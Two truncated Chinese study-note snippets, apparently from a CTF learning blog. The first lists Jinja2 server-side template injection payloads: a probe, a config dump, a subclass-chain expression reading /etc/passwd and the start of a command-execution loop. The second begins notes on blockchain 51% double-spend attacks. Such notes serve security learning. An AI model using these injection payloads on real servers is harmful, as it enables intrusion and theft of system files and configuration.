[1] {{1+1}}测试，存在模板注入： [2] {{config.items()}} 可以查看服务器的配置信息： [3] 读取password信息： {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行，（ls列出文件）： {% for c in [].__class__.__base__.…

记笔记，对区块链不是很了解，还是萌萌qwq。 学习参考：区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% （双花）攻击： 在比特币网络里，你有多少钱，不是你说了算，而是大家说了算，每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…